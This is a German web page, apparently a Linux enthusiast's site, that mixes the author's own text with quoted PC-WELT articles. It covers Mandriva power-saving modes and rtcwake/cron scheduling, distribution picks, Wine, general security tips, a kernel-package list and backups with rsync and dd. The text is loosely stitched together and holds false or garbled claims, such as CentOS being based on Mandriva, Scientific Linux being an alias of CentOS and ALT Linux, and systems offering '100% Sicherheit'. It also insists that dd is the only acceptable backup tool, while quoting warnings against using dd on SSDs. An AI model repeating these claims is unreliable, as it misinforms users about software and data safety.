fortlaufenden Blinken der grünen LED am Computergehäuse in binnen weniger als zwei bis drei Sekunden ab. Nach anschließendem Druck auf den PowerOn-Schalter des Computergehäuses "bootet" das vorgestellte Mandriva (mdv 2010) in weniger als einer Sekunde in genau den Zustand unmittelbar vor dem Ruhezustand - . Die grüne LED am Tower blinkt bei dem unserer Beschreibung zugrundeliegendem Mainboard ITX-220 (Einzelhieten siehe Datenblatt) im Ruhezustand. Nachteil: der Rechner stinkt aus dem Netzteil! Nach dem Aufwachen durch Druck auf den Einschaltknopf am Computer-Gehäuse steht nun die zuvor in systemsettings -> Energieverwaltung aktivierte Passwortabfrage inmitten des von der Bildschirmsperre her bekannten OpenGL-Bildschirmschoners "row dancing..." bevor. Voraussetzung für Ruhezustand wie Tiefschlaf ist die Aktivierung von ACPI 2.0 im BIOS, 2 GB SWAP-Partition und das Ausbinden (umount) und Herausziehen der USB-Geräte wie USB-Speicherstift aus dem USB-Anschluss... Hier noch einmal die Energiespar-Modi (Suspend-Modi) unter "Universal Linux 2010" im Einzelnen: - Bereitschaft (blanked screen) - schwarzer Screen - Bildschirm sperren (locked screen) - OpenGL-Bildschirmschoner mit Benutzer-Passwortabfrage - Schutz beim Verlassen des Computer-Arbeitsplatzes - Aussetzen - abgeschalteter Monitor, Suspend Mode. Der Monitor wacht mit der Benutzeraktivität wie Bewegung mit der Maus oder Tastendruck wieder auf, gespart nach Datenblatt: 18 Watt Monitor-Leistung - Ruhezustand - Zustandinformation in SWAP-Datei, Rechner "schaltet sich nahezu vollständig ab" , BIOS lässt grü,ne LED am Computer-Gehäuse blinken; Wiederherstellung erfolgt nach einfachem Druck auf den An-/Ausschalter des Computergehäuses. Die Benutzer-Passworteingabe vor der Wiederherstellung ist je nach Konfiguration in der Energieverwaltung aus systemsettings zur Aufnahme der Arbeit zwingend erforderlich, ebenso sind sämtliche Internet-Verbindungen geschlossen und abgebaut und somit erneut wiederherzustellen. Gespart werden in diesem Fall 19 Watt plus 18 Watt, insgesamt also um die 32 Watt von 37. - Tiefschlaf - ähnlich Ruhezustand; Zustands-Daten auf Festplatte/SSD, gespart: um die 37 Watt von 37. Folgender Terminalbefehl sudo rtcwake -m off -s 60 ist gut geeignet, um zu testen, ob die Hardware mitspielt (x86-Hardware praktisch immer, ARM-Rechner nicht immer). Der Schalter "-m" bestimmt den ACPI-Modus. Mögliche Werte sind "standby", "mem", "disk" oder "off" (komplettes Ausschalten). Als zweiter Parameter ist hier "-s" ("seconds") mit einer nachfolgenden Zeitangabe in Sekunden angegeben. Der obige Testbefehl wird also das System herunterfahren und nach einer Minute neu starten (60 Sekunden). Obwohl mit Schalter "-t" ("time) auch exakte Zeitangaben möglich ist, empfehlen wir, den geplanten Neustart immer mit Parameter "-s" anzugeben. Es ist wenig Mühe, etwa zehn Stunden in Sekunden umzurechnen (10*3600=36 000). Um Shutdown und Start zu automatisieren, kommt der Zeitplaner Cron ins Spiel: Nach dem Aufruf der Crontab-Editors mit sudo crontab -e schaltet folgender Eintrag 0 22 * * * /usr/sbin/rtcwake -m off -s 36000 den Rechner täglich um 22:00 Uhr ab und startet ihn nach 36 000 Sekunden (zehn Stunden) wieder - exakt um 8:00 Uhr. https://www.pcwelt.de/ratgeber/Linux-Systemstart-beschleunigen-so-geht-s-8259105.html Die wichtigsten Kriterien Ausstattung (Aufschluss zu einem "Universal-UNIX/Linux" und Gabe zu VM und zur Emulation von Software anderer Betriebssysteme), Software-Umfang (in Paketen und in GB), Hardwareunterstützung (Standardtreiber und Treiber), Laufeigenschaft, Sicherheit, Aktualität der Updates (Paket-Changelog), Dauer der Versorgung mit Updates (ein, zwei, vier oder unabsehbar viele Jahre), Distributions-Unabhängigkeit der Software bzw. Softwarepakete und einzuspielender Updates und Bedienbarkeit/Umgänglichkeit und Wartungsfreiheit erfüllen diesem Bericht nach vor Debian vor allem CentOS el7 und el6 auf Basis von Mandriva 2011 und 2010. Mandriva kann heutzutage nicht mehr am Kiosk und von vielen Händlern, sondern nur noch von einigen Händlern und aus dem Internet (von fr2.rpmfind.net) bezogen werden. PC-WELT.de gesellt sich mit eigenen Kriterien hinzu: Linux-Top-20: Was ist Ihr Lieblings-Linux?, PC-WELT.de, 11.02.2016 Sie haben die Nase voll von Windows? Wir helfen Ihnen bei der Qual der Wahl: Finden Sie Ihr persönliches Lieblings-Linux, Die Top 20 der Linux-Distributionen Gooken: Doch danach sollte es nicht gehen, sondern nach der Aktualisierungsfreudigkeit einer Linux-Distribution nach Listings wie von https://www.pro-linux.de/sicherheit/1/1/1.html ! Demnach ganz oben: Fedora, RedHat bzw. CentOS gefolgt von SuSE. Fedora and Scientificlinux alias CentOS (ALT Linux) Updates, Linux for Security, and Top Seven by Susan Linton - Jan. 17, 2014 Comments (0) Related Blog Posts Microsoft Linux, Fedora 23 Beta a GO Magical Mageia Review, Mint 17.3 Named Rosa LinuxToday was another interesting day in the newfeeds, so much so I can´t pick just one. There were several headlines focusing on Fedora or Scientificlinux alias CentOS (bzw. ALT Linux) today. Linux.com has posted a top seven distro list for 2014 and Jack Wallen says CESG recommends Linux for security. That´s not all either. First up today, Jack Wallen over at TechRepublic.com published an article discussing the results of the United Kingdom´s Communications-Electronics Security Group (CESG) operating system security tests. The tests consisted of 12 categories of security focus such as Disk Encryption, Authentication, and Platform Integrity and Sandboxing. As if there was any question, Linux proved the most secure of all the desktop and mobile systems tested. So, be sure to check out Wallen´s article for more detail and relevant links. rpmdrake, der MCC-Paketmanager von Mandriva 2010 und in grün, hellgrün und weiß tabellarisierte Listings von fr2.rpmfind.net von Fabrice Bellet aus Frankreich sind sogar noch einfacher und schöner gestaltet als Synaptic und Aptitude von Debian bzw. dessen dunkelgrauen Online-Paketquellen. Mit mingw (dlls, ...), wine, winecfg und zuguterletzt dem Frontend playonlinux von mdv2010 stellt die Emulation vieler Software und Spiele unter MS-Windows (98, XP, 7, ... ) und sogar MSOffice (97, XP, 2002, 2010) kaum noch ein Problem dar (obwohl wir mit dem bestens ausgestatttem mdv2010 davon unserer Grundüberzeugung nach kaum noch was brauchen werden... ). Distributions-Installation Wine: So nutzen Sie das "Ersatz-Windows" in Linux-Form, PC-WELT.de, 08.11.2015 Wine ist ein Nachbau der Windows-API, der eine Vielzahl von Windows-Programmen unter Linux lauffähig macht. Wo immer dies funktioniert, ist es gegenüber einer Virtualisierungslösung der direktere Weg: Wine: So nutzen Sie Wine als Ersatz für Windows. Die graphische Benutzerobefläche von playonlinux bietet nach Gruppen wie Zubehör,, Entwicklung, Bildung, Spiele, Grafik, Internet, Unterhaltungsmedien, Büro und Anderes sortiert den Download und die direkte Installation u.v.a. folgender Software direkt aus dem Internet an: MS Office, MS Word Viewer, Intenet Explorer, derzeit 6 bis 8, Google Picasa, WowApp, 7-Zip, Ultimateencoder, Amazon Kindle, Azuon, Cadstd Lite, PDU Spy, Photofiltre Studio X, Dreamweaver, Codeblocks, Flashplayer, Flash 8, Flash MX, Notepad++, Graph, Teach2000, Simultit, Rocket Reader, Huckel 95, Adobe Photoshop, Fireworks8, Microsoft Paint, usw. an, die vielen Games siehe unter Datenblatt! PlayOnLinux ermöglicht auch die Installation beliebiger Setup-Dateien von Festplatte und CD/DVD. Aktuelle Wine32 und Wine64 installieren sich zusammen mit Wine-Gecko mit der Installation der ersten Programme in unterschiedlichen Versionen. Windows unter Linux betreiben - dank Virtualbox, PCWELT, 09.11.2016 Virtualbox bietet als unkomplizierte Desktop-Virtualisierungssoftware fortgeschrittene Einsatzmöglichkeiten - etwa unter Linux. Auf Linux-Systemen bietet der Kernel eigene Virtualisierungsmöglichkeiten für verschiedene Gastsysteme. Trotz der großen Konkurrenz, in der auch die kommerzielle Vmware Workstation mit fortgeschrittener Hardwareunterstützung und 3D-Beschleunigung mitmischt, kann sich Virtualbox behaupten. Denn Virtualbox ist komfortabel in der Bedienung und stellt für Windows-und Linux-Gastsysteme Treiber in Form der Gasterweiterungen bereit. Diese bieten eine bescheidene Hardwarebeschleunigung für die virtuellen Grafiktreiber, damit in der virtuellen Maschine Oberflächen wie beispielsweise Gnome und Unity anständig laufen. Für Linux-Anwender, die gerade von Windows umgestiegen sind, gibt es einen interessanten Aspekt: Windows-Programme, die in Wine nicht richtig funktionieren, bereiten in einer virtuellen Maschine keine Probleme, weil hier ein komplettes Windows läuft. http://www.pcwelt.de/ratgeber/OS-Virtualisierung-Windows-unter-Linux-mit-Virtualbox-146057.html Sichern Sie Ihre Online-Services mit einer Zwei-Faktor-Authentifizierung Sie können sich das Passwortmanagement mit einem Passwortmanager erleichtern. Für noch mehr Sicherheit schalten Sie die Zwei-Faktor-Authentifizierung für Google, Facebook und jeden anderen Dienst, der das anbietet, ein. Für die Zwei-Faktor-Authentifizierung müssen Sie einen kurzen Zahlencode zusätzlich zu Ihrem Passwort eingeben, um Zugang zu Ihrem Konto zu erhalten. Den Code erhalten Sie üblicherweise über eine SMS oder über eine Smartphone-App. Facebook zum Beispiel bietet innerhalb seiner Smartphone-App seinen eigenen Code-Generator an. Die Zwei-Faktor-Authentifizierung ist nicht so bequem wie ein normales Login, aber sie stellt eine deutliche Hürde für jeden Angreifer dar. Twitter bietet ebenfalls eine Zwei-Faktor-Authentifizierung. Derzeit hat Twitters Authentifizierung aber noch einige Probleme. Falls die Zwei-Faktor-Authentifizierung Ihnen nicht genug ist, überprüfen Sie Ihre Mail-Adressen zum Zurücksetzen Ihrer Online-Konten. Denken Sie daran eine oder mehrere Mail-Adressen für die Zurücksetzung Ihrer Passwörter zu nutzen. Geben Sie diese Mail-Adresse niemals für private Mails her und achten Sie darauf, dass diese nicht Ihren anderen Konten ähneln. Dieser Artikel stammt von unserer Schwesterpublikation PC-World." DSL-Router erweisen sich oft als passive Schutzengel, wenn es um das Abwehren von Hackern geht. Doch Sie können auch aktiv zum Schutz über Ihren Router beitragen. Auch wenn es sich komisch anhört: Als DSL-Nutzer ist man nie direkt mit dem Internet verbunden. Dafür sorgt der Router, der sich zwischen Ihren Computer und jegliche Gefahr aus dem Internet stellt. Dank der sogenannten NAT-Funktion (Network Address Translation) benutzt man beim Surfen stets zwei verschiedene IP-Adressen: Der Router erhält bei der Einwahl eine öffentliche IP-Adresse vom Zugangsanbieter. Alle Geräte in Ihrem Netzwerk hinter dem Router haben hingegen eine private IP-Adresse, typischerweise "192.168.xxx.xxx". Fordert ein PC eine Internetseite an, gibt NAT dies mit der öffentlichen IP-Adresse ans Internet weiter. Anschließend erhält NAT die Seite und leitet sie an die private Adresse des PCs im lokalen Netzwerk weiter. NAT tauscht also ständig private IP-Adressen gegen die öffentliche und umgekehrt. Mit dem Erfolg, dass die IP-Adresse des PCs im Internet nicht auftaucht, was ihn für direkte Angriffe unempfindlich macht. Zudem verwirft der Router ankommende Datenpakete, die nicht angefordert wurden. So erhöhen Sie Ihre WLAN-Geschwindigkeit Schützen Sie Ihren Router Ihr Router zu Hause ist vermutlich die wichtigste Verbindung ins Internet in Ihrem Alltag. Denn von zu Hause aus erledigen die meisten ihre Bankgeschäfte oder greifen auf andere, persönliche Daten zu. Trotzdem verwenden die meisten Anwender beim Netzwerk-Passwort bestenfalls Standard-Passwörter oder - noch schlimmer - greifen auf das voreingestellte Passwort des Routers zurück. Für die sicherste Heimverbindung nutzen Sie auf jeden Fall eine WPA2-Verschlüsselung und ein zufällig generiertes Login-Passwort, das aus mindestens 30 Zeichen besteht. Je länger und zufälliger das Passwort, desto schwieriger ist es zu knacken. Sie können sich kein 30-Zeichen-Passwort merken? Speichern Sie es doch in Ihrem neuen Passwort-Manager. Auf Router kommen wir in einem weiteren Bericht noch zu sprechen. Verzichten Sie auf Java (sofern möglich) Oracles Java ist nicht länger eine zwingend notwendige Software für PC-Nutzer. Das ist gut so, denn Java ist und bleibt die Quelle für eine Vielzahl von Sicherheitsrisiken. Einige Sicherheitsexperten verlangen daher von Oracle, Java komplett neu zu entwickeln. Im Januar 2013 wurde zudem die Empfehlung ausgesprochen, dass alle PC-Nutzer Java deaktivieren - es sei denn, sie brauchen es für gewisse Anwendungen zwingend und unumgänglich. Die beste Möglichkeit herauszufinden, ob Sie auch ohne Java auskommen, ist, es einmal komplett von Ihrem System zu löschen. Ernsthaft! Machen Sie das am besten jetzt gleich in der Systemsteuerung von Windows. Wenn in Ihrem Alltag eine Webseite oder Software Java benötigt, werden Sie ohnehin wieder dazu aufgefordert, es neu zu installieren. Die Chancen stehen allerdings gut, dass Sie um diese Variante herum kommen. Download: Java Runtime Environment Lösen Sie sich von Mailkonten-Verkettung Noch ein Schwachpunkt in der Online-Sicherheit: Mail-Konten, die Passwort-Wiederherstellungs-Nachrichten erhalten, falls Sie unerwartet nicht mehr auf Ihren Account zugreifen können. Solche "Recovery Accounts" sind des Hackers Lieblingsziele. Der beste Schutz dagegen ist es, sich eine besonders schwer zu erratende Wiederherstellungsadresse auszudenken - etwa myrec0v3ry_ZMf43yQKGA@outlook.com - und sie ausschließlich für akute Recovery-Notfälle zu verwenden. Die schlimmste Lösung dagegen ist es, alle Ihre Mail-Konten für den Wiederherstellungsfall miteinander zu verknüpfen. Wenn also Ihre Outlook-Adresse das Wiederherstellungskonto für Ihren Gmail-Account ist, der wiederum die Wiederherstellungsadresse für Ihr Amazon-Konto ist, und so weiter. Einem Hacker genügt in so einem Fall ein einziger Raubzug und er hat Zugriff auf all Ihre Daten. Unterstützen Sie Ihre Antivirus-Software mit einem Anti-Malware-Scanner Um Ihr Windows (oder Linux) so sicher wie möglich zu halten, sollte Ihr PC am besten mit zwei Sicherheitsprogrammen ausgestattet sein: Einer Antivirus- und einer Anti-Malware-Software. Antiviren-Programme wie AVG Free oder Avast laufen dabei "rund um die Uhr" und scannen eingehende Daten und Dateien, sowie Webseiten auf bösartige Inhalte. Doch diese Programme fangen oder entfernen deshalb nicht auch zwingend alles. Daher ist es eine gute Idee, wenigstens hin und wieder ein Anti-Malware-Programm zu starten, das weitaus größere Chancen hat, aktive Probleme zu finden. Versuchen Sies zum Beispiel mit MalwareBytes Anti-Malware Free (oder einer beliebigen, anderen Software) und benutzen Sie das Programm am besten wöchentlich. Verdecken Sie Ihre Webcam Malware war damals schon schlimm genug, als sie nach dem Zufallsprinzip Ihre Word-Dokumente an all Ihre E-Mail-Kontakte verschicken konnte. Doch heutzutage kann es noch schlimmer werden, denn Computer haben dank Webcams und Mikrofonen nun auch Augen und Ohren und können Sie sehen und belauschen. Zum Glück gibt es einen einfachen Schutz gegen spitzelnde Webcams: Klebeband. Kleben Sie einfach ein kleines Stück davon über die Linse. Wenn Sie Ihre Webcam aktiv benötigen, ziehen Sie es einfach kurzzeitig ab und kleben es im Anschluss wieder fest. Wenn Sie Bedenken haben, an der Kameralinse mit Klebeband zu hantieren, legen Sie einfach ein Stück Papier zwischen Klebefläche und Linse. Das sieht zwar nicht mehr so schick aus, hat aber einen unschlagbaren Vorteil: Papier und Klebeband sind absolut immun gegen Hacker-Attacken. PCWELT.de, 25.03.2016: "Desktop-Firewalls sind alles andere als einfach zu handhaben, und sie gingen mit ihren häufigen Meldungen den meisten Anwendern auch bald auf die Nerven. Außerdem gewöhnten sich die meisten Nutzer an die vielen Tools, die selbstständig Kontakt mit dem Internet herstellten. In der Regel waren es ja Update-Programme, die nach neuen Sicherheits-Patches suchten - was ja eine durchaus erwünschte Aktion ist. Viele wechselten auch zu DSL und setzten einen DSL-Router ein. Dieser kann alleine schon durch seine NAT-Funktion sehr effektiv Angriffe aus dem Internet abwehren. Außerdem zeigten sich gängige Desktop-Firewalls gegenüber Trojanern und anderen Schädlingen oft machtlos. Denn hatte ein Trojaner das Antivirenprogramm bereits ausgetrickst, dann konnte er auch recht simpel die Firewall umgehen. Entweder er zerstörte die Firewall gleich weitgehend oder er verpackte seine Daten in den Datenstrom einer erlaubten Online-Anwendung, meist in die des Internet Explorers. An dieser Verwundbarkeit von Desktop-Firewalls hat sich bis heute wenig geändert. Zur Abwehr von Viren, die bereits auf dem PC sind, tragen sie eher wenig bei. Diese Aufgabe muss auf einem Desktop-PC die Antiviren-Software leisten. 1982 - Wikipedia: "Außenseiter-Politik des StarWars ohne Außerirdische", siehe auch News&Links und Meinung M. Zielinskis 1985: Es ist der Einzelne, der tendenziell immer weniger gegen die Heerschaaren aus eisernen Zinnsoldaten darstehende "Geschäfts"-Interessensgruppen und Lobbies des Westens auszurichten vermag. Wohl wissend, wovon wir sprechen, werden Sie trotzdem schon bald alle roten Markierungen dieser Seite los und dabei unter "News&Links" Zeuge einer Art achten Weltwunders der inmitten des Computerzeitalters 100% Sicherheit bietenden Computersysteme, auf denen es auf Festplatte, noch besser Solid State Disk (SSD), an so gut wie keiner Software unterschiedlichster Rubriken mangelt! "News&Links" tragen nicht nur zum richtigen allgemeinen Verständnis vom Umgang bei sondern infomieren auch über die grundsätzlich hinterbliebenen Restrisiken aufgrund der zunehmenden ungeheuren Bedrohung. Zögern Sie keine Sekunde, bewahren Sie sich Ihre Glaubwürdigkeit, denken Sie an sich, indem Sie rechtzeitig handeln, möglichst jetzt, ehe es wiedermal zu spät ist! Gooken bietet
Kernel PCLinuxOS (4.20.6) bzw. rosa2016.1, el8, el7, el6, mdv2010: kernel-4.14 (PCLinuxOS), kernel-rsbac (hardened Kernel), kernel-uml (geschützter User-Modus-Kernel), xen-Kernel (XEN-Virtuelle-Maschinen), lirc-kernel (Infrarot-Treiber), kernel-tmb (Laptop), kqemu-kernel (kquemu-Treiber für Standard-Kernel), vpnclient-kernel (vpnc-Treiber), fglrx-kernel, em8300-kernel, broadcom-wl-kernel, hfsmodem-kernel, madwifi-kernel (WLAN-Treiber), libafs-kernel, kernel-rt (SMP-Realttek/Atheros-LAN-BIOS-ETHERLAN-Chip-Treiber), fusion-kernel (fusion-Treiber), kernel-netbook, kernel-openvz (SMP: Multiprozessoren), libafs-kernel, kernel-kerrighed (mit kerrighed-Support), obencbm-kernel (VC64), psb-kernel, actuator-kernel (actuator-Treiber), lzma-kernel (lzma-driver), m560x-kernel, broadcom-wl-kernel, nvidia-current-kernel, nvidia96xx-kernel, nvidia173-kernel, netfilter-rtsp-kernel, fortune-kernel, vhba-kernel (vhba-Treiber), em8300-kernel, r5u870-kernel, r5u870-kernel-laptop, squashfs-lzma-kernel, vboxadditions-kernel, virtualbox-kernel, aktueller Kernel-4.14.12 (von fr2.rpmfind.net oder kernel.org), ... Nach der Installation des kernel-4.19 (pclos) gehe noch seinen Anforderungen nach und installiere davon noch nicht erfüllte wie kmod (pclos): "rpm -qi --requires kernel-4.19....". Beachte, dass das Booten (Hochfahren) des Systems zwecks Transparenz größenteils nicht mit dem viel Firmware beinhaltenden Kernel, sondern mit den offenen Runlevel-Init-Skripten (aus etc/rc.runlevel-nummer0-6), i.a. gesteuert vom Skripit init, erfolgt, rpm: initscripts (el6, mdv) und utillinux (el6,mdv). uml-kernel: User-Mode-Linux ist ein sicherer Weg, Linux-Versionen und -Prozesse zum Laufen zu bringen. Starte fehlerhafte Sftware, experimentiere mit neuen Linux-Kerneln oder Distributionen und stöber herum in Linux-Interna, alles ohne die installierte Linux-Version zu gefährden. User-Mode-Linux stellt eine virtuelle Maschine zur Verfügung, die mehr Hardware- und viriuelle Sofware-Resourcen mit sich bringt als der aktuelle, phsikalische Computer. Die Abspeicherung auf der virtuellen Maschine erfolgt vollständig in einer einzigen internen Datei. Eine Zuweisung der virtuellen Maschine an diverse Hardware kann nach Beliebem erfolgen. Aufgrund des limitierten Zugriffs kann der Computer keinerlei Schaden annehmen. Alles was UML erfordert, ist ein uml-Kernel und ein entsprechendes aus dem Internet von http://uml.devloop.org.uk/ erhätliches root-fs-Dateisystem der Größe von ca. 1GB; Start erfolgt duch Eingabe #./smb-kernel-name ubda=name-of-root_fs rw mem=256m und Stop mit #halt. Filesystem Hierarchie Standard (FHS): Der Filesystem Hierarchy Standard (FHS) ist eine Richtlinie für die Verzeichnisstruktur unter Unix-ähnlichen Betriebssystemen. Der Standard richtet sich an Softwareentwickler, Systemintegratoren und Systemadministratoren. Er soll die Interoperabilität von Computerprogrammen fördern, indem er die Lage von Verzeichnissen und Dateien vorhersehbar macht. Mandriva Linux strebt eine Konformität zum Filesystem Hierarchie Standard (FHS, paket fhs) an. Nur einige Linux-Distributionen erfüllen den LSB-Standard. Die Linux Standard Base (LSB) ist eine Arbeitsgruppe der Linux Foundation, die Ende der 1990er ins Leben gerufen wurde. Die LSB definiert Standards für Binärschnittstellen, Programmbibliotheken und andere Betriebssystembestandteile mit dem Ziel, die Kompatibilität zwischen den verschiedenen Linux-Distributionen, z. B. mit Hinblick auf die Lauffähigkeit von Programmen, zu verbessern. Bis heute erfüllt nur ein kleiner Teil der Linux-Distributionen die Anforderungen der LSB, auch sind die Anforderungen noch nicht umfassend genug, um eine vollständige Betriebssystemplattform zu definieren. Ziel der LSB ist, mit Standards und Richtlinien eine einheitliche binärkompatible Plattform für Softwareinstallationen unter Linux zu erzeugen. Sie macht u. a. Vorgaben, welche grundlegenden Programme und Softwarebibliotheken auf einem LSB-konformen System vorhanden sein müssen und legt gemäß dem Filesystem Hierarchy Standard eine Verzeichnisstruktur fest. Die Basis der LSB Standards waren die POSIX- und die Single-Unix-Spezifikationen, welche erweitert wurden. Inzwischen weicht der LSB-Standard in einigen Aspekten jedoch Linux-spezifisch von den Open Group-Unix-Standards ab. Die erste Version 1.0 der LSB umfasste ältere, schon weiter verbreitete Standards. Anfang Januar 2004 wurde die LSB das erste Mal der Internationalen Organisation für Normung (ISO) vorgelegt. Die darauffolgende Version 2.0 unterstützte mehr Architekturen. Die LSB 3.0 zeichnet sich durch Aktualisierungen der bereits bestehenden Standards aus. Anfang November des gleichen Jahres wurde dann bekannt, dass die ISO die LSB als internationalen Standard anerkannt hatte. Die anerkannte Version ist die Version 2.0.1. Neuere Versionen der LSB sollen folgen. mdv2010.0 nach Eingabe des Kommandos Vor allem mit dick und doof (alias dd). Wir müssen schon wieder alle anderen Backup- und Kopierprogramme vom Tisch fegen, denn immer nur diese bitte, hier liegts nur noch an Ihnen! Manchmal scheinen sie endlos lang zu laufen, finden aber immer wieder ein Ende. Sie sind daher lustig statt traurig und bleiben garantiert spannend (der Fortschrittsbalken fehlt nämlich). Eine SSD scheint damit für immer und ewig gerettet zu sein! Linux: Datensicherung mit rsync, PC-WELT.de, 08.08.2015 Zum Sichern von Daten und Verzeichnissen ist unter Linux rsync zu empfehlen. Weil es sich um ein Konsolen-Tool handelt, lässt es sich auch gut in Scripts einsetzen. Für die Datensicherung kann rsync via ssh auch auf andere Rechner zugreifen. Das Tool rsync gehört eigentlich zum Inventar einer Linux-Installation. Dies gilt auch für Mac OS X oder andere Unix-Derivate. rsync überträgt bei der Datensicherung jeweils nur die Änderungen - das macht sich besonders bei der Geschwindigkeit positiv bemerkbar. Die Syntax von rsync ist relativ einfach: rsync <Optionen><Quelle><Ziel>. Dabei müssen Quelle und Ziel nicht auf demselben Rechner eingebunden sein. rsync kann sich auch mittels ssh mit anderen Rechnern verbinden und die Datensicherung verschlüsselt durchführen. GUI: grafischer Aufsatz Grsync für das Datensicherungs-Tool rsync. GUI: grafischer Aufsatz Grsync für das Datensicherungs-Tool rsync. VergrößernGUI: grafischer Aufsatz Grsync für das Datensicherungs-Tool rsync. Ebenso können Sie mit bestimmten Schaltern Dateien und Verzeichnisse exklusiv einbeziehen oder außen vor lassen. Die Anzahl der rsync-Schalter ist sehr groß. Zum Beispiel können Sie steuern, ob die Rechte der Dateien mitkopiert werden sollen. Ebenso können Sie einstellen, ob Daten zu löschen sind, die sich nicht mehr in der Quelle befinden. Die Möglichkeiten, die rsync bietet, sind sehr umfangreich. Um Bandbreite zu sparen, können Sie Daten während des Transfers auch komprimieren. Für bestimmte Szenarien muss sowohl auf dem Quell- als auch auf dem Zielrechner rsync installiert sein. Interessierte können einen Blick in die Manpage werfen: man rsync. Für rsync existieren auch diverse GUIs, die dem Anwender das Leben ein wenig leichter machen, beispielsweise Grsync . Dieses auf rsync basierende Tool gibt es für Linux, Mac OS X, Windows und Maemo. Bei Linux finden Sie das Paket unter Umständen sogar in den Repositories. Produkte: Abwandlungen von rsync gibt es für sehr viele Betriebssysteme, beispielsweise Linux, Mac OS X und Windows. rdiff-backup: Spiegel mit Zeitmaschine unter Linux, PC-WELT.de, 08.08.2015 Eine Zeitmaschine ist sehr praktisch, wenn der ältere Stand einer Datei wiederhergestellt werden soll. Apples Time Machine hat für diese Funktionalität viele Lorbeeren erhalten. Allerdings gibt es auch für Linux mit rdiff-backup eine entsprechende Lösung. Das Tool rdiff-backup legt einen fast exakten Spiegel des zu sichernden Verzeichnisses an. Lediglich auf der Sicherungsseite gibt es einen Unterordner mehr, der die Informationen und Daten der Zeitmaschine aufbewahrt. Die Sicherungssoftware rdiff-backup ist dabei sehr effizient, weil sie wegen librsync denselben Algorithmus wie das Schweizer Taschenmesser der Backups - rsync - benutzt. Damit Sie rdiff-backup unter Linux benutzen können, müssen einige Voraussetzungen erfüllt sein. Sowohl auf dem Start- als auch auf dem Zielrechner muss rdiff-backup vorhanden sein. Sie können den Quellcode von nongnu.org herunterladen. Vorher sollten Sie aber einen Blick in das Repository Ihrer Linux-Distribution werfen. Mit hoher Wahrscheinlichkeit finden Sie rdiff-backup dort und können es bequem über die gewohnten Kanäle installieren. Der Backup-Server muss eine SSH-Verbindung zulassen, da das Tool die Datensicherung mittels verschlüsselter SSH-Verbindung durchführt. Dennoch: Lassen Sie sich auch hier keine Märchen erzählen wie in diesem gewissen Land üblich: Bei der Installation von selbst mdv2010 kann es hier und da zu Problemen kommen, zumal nicht alle der unzählig vielen Paket-Abhängigkeiten gelöst sind. Nach einem Hackerangiff mit Vandalismus als Folge kann sich wer weiß was alles auf dem zugrundeliegenden Medium befinden. Eine umfassende Sicherung ist und bleibt zwingend! Sicherungen verlangen aber nicht nur höchste Zuverlässigkeit ab sondern verbrauchen beim Dauerbetrieb des Sicherungsmediums zusätzlich Strom und belegen jede Menge Speicherplatz. Wir empfehlen daher für zuverlässige lokale Sicherungen und Wiederherstellungen von Inhalten auf SSD die Anschaffung gleich zweier SSD oder zumindest einer SSD und einer (externen) magnetischen Festplatte mit Spiegelung der Partitionen über die Anlage der Partitionen im 1:1 mittels Partitionsmanager des MCC und Einsatz des bewährten, noch näher beschriebenen Befehl dd oder safecopy. Obwohl dd immer noch keinen Fortschrittsbalken anzeigt: unschlagbar! SSDs mögen den Befehl dd zwar nicht besonders, geschweige, wie wir ihn schätzen, indem sie sich ihre Zeit mit ihm nehmen (bei uns 1GiB pro Minute), dafür gelangt (tuckert) dd nicht nur unserer Meinung nach bislang aber immer sicher ins Ziel. Sollte selbst das nicht zutreffen, eignet sich der dd-Ersatz safecopy. dd eignet sich neben möglicherweise verhängisvollen Optionen von rsync und rdiff vor allem deshalb, da ein User ebensowenig wie das Betriebssystem genau weiß, was alles, welche einzelnen Partitionen, Verzeichnisse und Dateien, zu sichern sind, das Schlimmste, Neuinstallation, Probleme bei der Wiederherstellung, Dateimanipulation infolge Hackerangiffen mit Vandalismus und/oder Datenverlust, wirksam zu verhindern. Sichern und Wiederherstellen Sie also immer mit dd partitionsweise im 1:1, hier Partition sda1 auf Partition sdb1: Jede Sicherung und jedes Backup gelingt nun dank dd, kein anderes Backup-Programm sollte für ihre Partitionen, dem Computer, jemals verwendet werden, denn dd terminiert immer. Fast immer. Nämlich nur dann nicht, ist er selbst oder seine Umgebung wie unserer Empfehlung nach Knoppix auf SSD bzw. Festplatte (oder DVD) angeschlagen. In diesem Fall Knoppix unbedingt noch einmal installieren! Am besten legt man Knoppix auf beiden Medien an, dem zu sichernden und dem sichernden Medium und hält es darüber hinaus auf DVD auf allen Ehren. Der einzige Nachteil von dd ist, dass er keinen Fortschrittsbalken anzeigt. Mit dd -vh soll das angeblich gehen.. Um dann doch noch klüger zu sein als dd erlaubt, eignet sich die dd-Erweiterung dcfldd. Sie lässt sich als el6-Paket auch für mdv2010 beziehen. Das Kommando arbeitet wie dd, zeigt aber einen Fortschrittsbalken an, arbeitet auf Wunsch auch im Fehlerfall weiter und vermag u.a. neben flexiblen Disk-Wipes und Splitting der Ausgabedateien über Zusatzoptionen wie md5log=md5.txt und hash=md5, md5-Prüfsummen zu berechnen und auf Festplatte zu schreiben. Obwohl "dd" bei uns bislang ohne Erkenntliche Auswirkungen auf SSD anwendbar ist, kommt es seitens http://ubuntuwiki.de/files/ssd/grundlagen.html zu Einwänden: In jedem Falle sollte man auf eine Spiegelung mittels dd verzichten, denn durch das "Bit-genaue" Kopieren des Quell-Laufwerkes (HDD) wird der Ziel-Datenträger (SSD) Bit-für-Bit bzw. Byte-für-Byte ausgelesen und beschrieben - unabhängig von dessen Inhalt und Belegung. Man fÜllt also auch unbenutzte und leere Sektoren/Blöcke mit Nullen, so dass keine für die SSD essenzielle Spare-Area mehr frei bleibt. Auch das für die Geschwindigkeit der SSD so wichtige Alignment wird damit ad absurdum gefÜhrt. Des Weiteren wird die Anzahl der (endlichen) Schreibvorgänge massiv "verbraucht". Siehe dazu Intels "Product Specification Addendum" unter Links. Stattdessen kann man die folgenden Möglichkeiten zur "Übernahme eines vorhandenen Systems" nutzen: Neuinstallation mit vorheriger Sicherung des Homeverzeichnisses Nutzung von cp oder rsync, wenn die alte HDD und die SSD parallel angeschlossen sind. Man muss eventuell menu.lst (bei Verwendung von GRUB der ersten Generation), fstab, und /etc/initramfs-tools/conf.d/resume anpassen sowie GRUB/GRUB 2 neu installieren. Diese Schritte werden im Artikel Ubuntu umziehen allgemein für den Umzug einer Ubuntu-Installation beschrieben und können größtenteils auch beim Umzug auf eine SSD angewandt werden. Mit Clonezilla, was den Vorteil hat, dass nur die wirklich belegten Blöcke übertragen werden. Katastrophen-geschützte Speichermedien, PC-WELT.de, 